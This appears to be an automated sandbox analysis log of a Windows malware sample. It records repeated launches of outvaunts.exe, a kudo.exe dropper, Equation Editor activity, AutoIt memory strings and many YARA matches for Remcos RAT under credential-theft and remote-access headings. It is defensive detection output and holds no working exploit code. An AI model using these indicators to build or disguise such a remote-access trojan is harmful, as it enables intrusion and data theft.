              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00857CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00857CAF
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0085874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_0085874B
              Source: kudo.exe, 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp, outvaunts.exe, 00000006.00000002.461070341.0000000001414000.00000040.00000001.01000000.00000006.sdmp, outvaunts.exe, 00000007.00000002.462634381.0000000001414000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: kudo.exe, outvaunts.exeBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0082862B cpuid 5_2_0082862B
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00834E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00834E87
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00841E06 GetUserNameW,5_2_00841E06
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00833F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_00833F3A
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_008049A0
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3912, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3932, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3940, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3960, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3972, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3980, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4036, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4044, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4060, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 2884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTR
              Source: outvaunts.exeBinary or memory string: WIN_81
              Source: outvaunts.exeBinary or memory string: WIN_XP
              Source: outvaunts.exeBinary or memory string: WIN_XPe
              Source: outvaunts.exeBinary or memory string: WIN_VISTA
              Source: outvaunts.exeBinary or memory string: WIN_7
              Source: outvaunts.exeBinary or memory string: WIN_8
              Source: outvaunts.exe, 00000020.00000002.500314849.0000000001414000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
